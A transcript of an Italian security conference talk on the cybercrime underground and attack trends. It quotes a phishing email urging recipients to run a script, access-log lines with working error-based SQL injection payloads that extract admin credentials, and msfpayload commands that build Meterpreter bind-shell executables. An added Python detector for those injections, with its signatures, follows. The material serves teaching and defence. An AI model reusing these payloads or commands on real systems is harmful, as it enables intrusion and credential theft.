
Attacchi, bugie e underground digitale by Andrea Pompili

May 17, 2015

Is it possible that, after years of indiscriminate leaks, emptied bank accounts and persistent attacks of every shape and colour, nothing has changed?
Is it possible that, despite the OWASP Top 10 being cited ad nauseam and the desperate cries of the security "experts", certain habits remain so hard to kill?
Between truth and legend, we will try to understand what really matters to the poor attacker and what, unfortunately, is on offer from a world of information technology perpetually dazzled by the myth of the magic box.
Transcript
Page 1: Attacchi, bugie e underground digitale by Andrea Pompili

Page ‹N› Except where otherwise noted, this work is licensed under http://creativecommons.org/licenses/by-nc-sa/3.0/

Andrea Pompili

[email protected] – Xilogic Corp.

ROMA 20-23.03.2013 www.codemotionworld.com

ATTACCHI, BUGIE E UNDERGROUND DIGITALE (Attacks, lies and the digital underground)

Speaker: Andrea Pompili

There are only 10 types of people in the world:

Those who understand binary, and those who don't

Page 2: Attacchi, bugie e underground digitale by Andrea Pompili

Page 3: Attacchi, bugie e underground digitale by Andrea Pompili

> Wholesale clean-up and hardening carried out a year earlier

> Operating systems patched to the latest available version

> Full logging of all site activity

> 2 IPS (Intrusion Prevention System) appliances in cascade

Page 4: Attacchi, bugie e underground digitale by Andrea Pompili

[Pie chart: sources of data loss incidents] Outside 70% · Inside - Accidental 12% · Inside - Malicious 9% · Inside 5% · Unknown 4%

Source: http://datalossdb.org/ 2012 statistics

Page 5: Attacchi, bugie e underground digitale by Andrea Pompili

[Chart: total attacks detected since 2007; the plotted values survived extraction without their labels: 7.20%, 6.20%, 6.10%, 5.70%, 6.80%, 6.80% / 29.90%, 41.20%, 27.20%, 34.10%, 34.10%, 30.70% / 62.90%, 52.60%, 66.70%, 60.20%, 59.10%, 62.50%]

Total attacks detected since 2007. Source: OAI (Osservatorio sugli Attacchi Informatici in Italia), "Rapporto OAI 2012"

Page 6: Attacchi, bugie e underground digitale by Andrea Pompili

[Chart: impact of detected attacks; three groups of four values, each summing to 100%, survived extraction without their labels: 76.00% / 3.80% / 16.80% / 3.40%; 76.00% / 6.50% / 13.70% / 3.80%; 76.40% / 6.70% / 13.70% / 3.20%]

Impact of detected attacks. Source: OAI (Osservatorio sugli Attacchi Informatici in Italia), "Rapporto OAI 2012"

Page 7: Attacchi, bugie e underground digitale by Andrea Pompili

«It is not the purpose of this "focus" to report the survey results in detail, but analysing the data on the average values for the whole sample, the results can be considered:

• satisfactory for logical protection;

• very satisfactory for infrastructure security;

• sufficient for the security of services;

• in need of improvement for the security of the organisation.

«We can say we were expecting it»

Page 8: Attacchi, bugie e underground digitale by Andrea Pompili

Page 9: Attacchi, bugie e underground digitale by Andrea Pompili

Page 10: Attacchi, bugie e underground digitale by Andrea Pompili

Page 11: Attacchi, bugie e underground digitale by Andrea Pompili

Aki Mon Telecom Shane Atkinson

Canter & Siegel

Eddie Davidson

Peter Francis-Macrae

Davis Wolfgang Hawke

Jumpstart Technologies

Vandar Kushnir

Kevin Lipnitz

Wayne Mansfield

Oleg Nikolaenko

Alan Ralsky

Dave Rhodes

Scott Richter

Russian Business Network

iFrame Cash

SBT Telecom Network

Defcon Host

Micronnet Ltd.

InstallsCash

Sendar Argic

Richard Colbert

RBNet

Source: Panda Security, «The Cyber-crime Black Market: Uncovered» - 2011

Page 12: Attacchi, bugie e underground digitale by Andrea Pompili

http://www.forbes.com/sites/andygreenberg/2012/03/23/shopping-for-zero-days-an-price-list-for-hackers-secret-software-exploits/

Page 13: Attacchi, bugie e underground digitale by Andrea Pompili

Page 14: Attacchi, bugie e underground digitale by Andrea Pompili

(*) According to Frank Rieger, Chief technology officer at GSMK

Page 15: Attacchi, bugie e underground digitale by Andrea Pompili

Source: Vincenzo Iozzo – OWASP Day 2012

Page 16: Attacchi, bugie e underground digitale by Andrea Pompili

Source: Vincenzo Iozzo – OWASP Day 2012

Page 17: Attacchi, bugie e underground digitale by Andrea Pompili

So, how does one get full remote code execution in Chrome? In the case of Pinkie Pie's exploit, it took a chain of Six Different Bugs in order to successfully break out of the Chrome sandbox. (http://blog.chromium.org/2012/05/tale-of-two-pwnies-part-1.html)

Last year (2011), VUPEN released a video to demonstrate a successful sandbox escape against Chrome but Google challenged the validity of that hack, claiming it exploited third-party code, believed to be the Adobe Flash plugin. (http://www.zdnet.com/blog/security/pwn2own-2012-google-chrome-browser-sandbox-first-to-fall/10588)

Page 18: Attacchi, bugie e underground digitale by Andrea Pompili

Blackhole Exploit Kit

Cool Exploit Kit

Page 19: Attacchi, bugie e underground digitale by Andrea Pompili

http://trailofbits.files.wordpress.com/2011/08/attacker-math.pdf

Page 20: Attacchi, bugie e underground digitale by Andrea Pompili

Page 21: Attacchi, bugie e underground digitale by Andrea Pompili

Page 22: Attacchi, bugie e underground digitale by Andrea Pompili

Page 23: Attacchi, bugie e underground digitale by Andrea Pompili

From: [email protected]

Sent: Thursday, November 04, 2004 7:48 PM

To: [email protected]

Subject: Configuration update

Hello,

you are receiving this e-mail because problems have been detected with your e-mail account. The cause of these problems lies in an incorrect configuration of your computer, which we ask you to update by connecting to the following address:

http://xxxx.rcs.it/software/av/index.html

Please run the self-configuration script, Configurazione.vbe, whose link is available on the indicated page. When the configuration is complete, a message confirming the successful update will appear.

Best regards

Help Desk - Technical Support RCS

RCS Editori S.p.A. - Newspapers Division

Page 24: Attacchi, bugie e underground digitale by Andrea Pompili

Page 25: Attacchi, bugie e underground digitale by Andrea Pompili

Page 26: Attacchi, bugie e underground digitale by Andrea Pompili

Page 27: Attacchi, bugie e underground digitale by Andrea Pompili

173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"

178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+and(/*!select*/+1+/*!from*/(/*!select*/+count(*),concat_ws(0x3a,substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+"

Page 28: Attacchi, bugie e underground digitale by Andrea Pompili

89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=11502+and(select+1+from(select+count(*),concat_ws(0x3a,substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"

Web Shell Extension

Page 29: Attacchi, bugie e underground digitale by Andrea Pompili

http://evader.stonesoft.com/

http://insecure.org/stf/secnet_ids/secnet_ids.html
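The two access-log slides above show the sequence an IDS signature has to catch: a column-count probe (`order by 1000`), then an error-based extraction that abuses `floor(rand(0)*2)` with `group by` to leak `user()`, `version()` and `database()` through a duplicate-key error, and finally a read of `username,password,admin` from `be_users` (the `tx_…_pi1` parameter and the `be_users` table are TYPO3 conventions). The second request wraps its keywords in MySQL version comments (`/*!select*/`), which the server executes as plain SQL but a keyword signature applied to the raw request never sees; that is the class of evasion the Evader and Insecure.org links refer to. The Python below is an added example, not part of the original talk: it parses the slides' log lines (re-typed here; the request on slide 27 is completed with the `HTTP/1.0` token the slide cut off, and a benign request is constructed for contrast), unwraps the version comments before matching, and reports which signatures fire per parameter. The signature names and the parameter-by-parameter approach are the example's own choices.

```python
"""Added example: detect MySQL error-based SQL injection in Apache access logs,
unwrapping the /*!keyword*/ version-comment obfuscation before matching."""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import parse_qsl, urlsplit

# Log lines re-typed from the slides (attacker IPs as printed there). The second
# request is completed with "HTTP/1.0", which the slide cut off, and the last line
# is a constructed benign request for contrast.
SAMPLE_LOG = r"""
173.254.216.69 - - [13/Nov/2012:20:03:35 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+order+by+1000+--+ HTTP/1.0"
178.32.211.140 - - [13/Nov/2012:20:03:43 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1+and(/*!select*/+1+/*!from*/(/*!select*/+count(*),concat_ws(0x3a,substring((concat_ws(0x3b,user(),version(),database(),repeat(0x00,100))),1,64),floor(rand(0)*2))x+/*!from*/+/*!information_schema*/.tables+group+by+x)a)+--+ HTTP/1.0"
89.253.105.39 - - [15/Nov/2012:12:32:14 +0100] "GET /some_path/some_file.html?tx_wfqbe_pi1[uid]=11502+and(select+1+from(select+count(*),concat_ws(0x3a,substring((SELECT+binary(concat(concat_ws(0x3a,username,password,admin),repeat(0x00,100)))+FROM+be_users+WHERE+admin=1+LIMIT+1,1),1,64),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+ HTTP/1.0" "Opera/9.80 (Windows NT 6.1) Presto/2.12.388 Version/12.10"
10.0.0.5 - - [15/Nov/2012:12:40:00 +0100] "GET /index.php?id=2501&tx_wfqbe_pi1[uid]=1 HTTP/1.1"
"""

# Apache common/combined log prefix: ip ident user [time] "METHOD target HTTP/x.y"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"'
)

# /*!select*/ (or /*!50000select*/) is executed by MySQL as the bare keyword, so a
# signature that looks for "select" in the raw request never sees it.
VERSION_COMMENT_RE = re.compile(r"/\*!\d*\s*(.*?)\*/", re.S)
PLAIN_COMMENT_RE = re.compile(r"/\*.*?\*/", re.S)

# Applied to the normalised (decoded, de-commented, lower-cased) parameter value.
SIGNATURES = {
    "order-by column probe": re.compile(r"\border\s+by\s+\d+"),
    "subselect in parameter": re.compile(r"\bselect\b.*\bfrom\b", re.S),
    "error-based floor(rand(0)*2) group-by": re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)"),
    "information_schema access": re.compile(r"\binformation_schema\s*\."),
    "server fingerprint (user/version/database)": re.compile(
        r"\b(user|version|database)\s*\(\s*\)"),
    "credential table read": re.compile(
        r"\b(username|password)\b.*\bfrom\s+\w*users\b", re.S),
    "trailing SQL comment": re.compile(r"(--|#)\s*$"),
}


@dataclass
class Finding:
    ip: str
    timestamp: str
    param: str
    normalised: str      # decoded, de-commented, lower-cased parameter value
    obfuscated: bool     # True when MySQL version comments were present
    hits: list[str] = field(default_factory=list)


def normalise(value: str) -> tuple[str, bool]:
    """Return (canonical SQL text, obfuscation flag) for one decoded parameter value."""
    obfuscated = VERSION_COMMENT_RE.search(value) is not None
    text = VERSION_COMMENT_RE.sub(r" \1 ", value)   # /*!select*/ -> select
    text = PLAIN_COMMENT_RE.sub(" ", text)          # /**/ used as whitespace
    return re.sub(r"\s+", " ", text).strip().lower(), obfuscated


def scan_request(target: str):
    """Yield (param, normalised_value, obfuscated, hits) for each suspicious parameter."""
    # parse_qsl percent-decodes and turns '+' into spaces, exactly as the server does
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        norm, obfuscated = normalise(value)
        hits = [label for label, rx in SIGNATURES.items() if rx.search(norm)]
        if hits:
            yield name, norm, obfuscated, hits


def scan_log(text: str) -> list[Finding]:
    """Run every signature over every query parameter of every request line."""
    findings: list[Finding] = []
    for line in text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, norm, obfuscated, hits in scan_request(m["target"]):
            findings.append(Finding(m["ip"], m["ts"], param, norm, obfuscated, hits))
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        flag = " [version-comment evasion]" if f.obfuscated else ""
        print(f"{f.ip} {f.param}{flag}: {', '.join(f.hits)}")
        print(f"    {f.normalised[:110]}")
```

The decoding step matters as much as the signatures: matching on the raw request line would miss the second attacker entirely, while matching after `parse_qsl` and comment unwrapping puts all three requests in the same bucket and still leaves the benign `uid=1` request clean.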

Page 30: Attacchi, bugie e underground digitale by Andrea Pompili

Page 31: Attacchi, bugie e underground digitale by Andrea Pompili

msfpayload windows/meterpreter/bind_tcp X > moca_x86_tcp_4444.exe

Page 32: Attacchi, bugie e underground digitale by Andrea Pompili

msfpayload windows/x64/meterpreter/bind_tcp X > moca_x64_tcp_4444.exe

Page 33: Attacchi, bugie e underground digitale by Andrea Pompili

“The truth is, consumer-grade antivirus products can't protect against targeted malware created by well-resourced nation-states with bulging budgets. They can protect you against run-of-the-mill malware: banking trojans, keystroke loggers and e-mail worms. But targeted attacks like these go to great lengths to avoid antivirus products on purpose”

(Mikko Hyppönen, F-Secure, writing in Wired, June 2012)

Page 34: Attacchi, bugie e underground digitale by Andrea Pompili

<#1> Think like an attacker, so that you understand what they will do and how they will attack you

<#2> Try to understand their objectives and the capabilities they have, but above all the operational constraints they work under

<#3> Identify the «perceived» value of what you want to defend, but above all what it is you want to defend

<#4> Work on the whole defensive perimeter, without acts of faith

<#5> If your defence is cheaper than the attack, you will always be ahead

Page 35: Attacchi, bugie e underground digitale by Andrea Pompili

Page 36: Attacchi, bugie e underground digitale by Andrea Pompili

Domande? (Italian) · مطالب أية (Arabic) · ¿Preguntas? (Spanish) · Questions? (English) · tupoQghachmey (Klingon) · Sindarin · Japanese · Ερωτήσεις? (Greek) · вопросы? (Russian)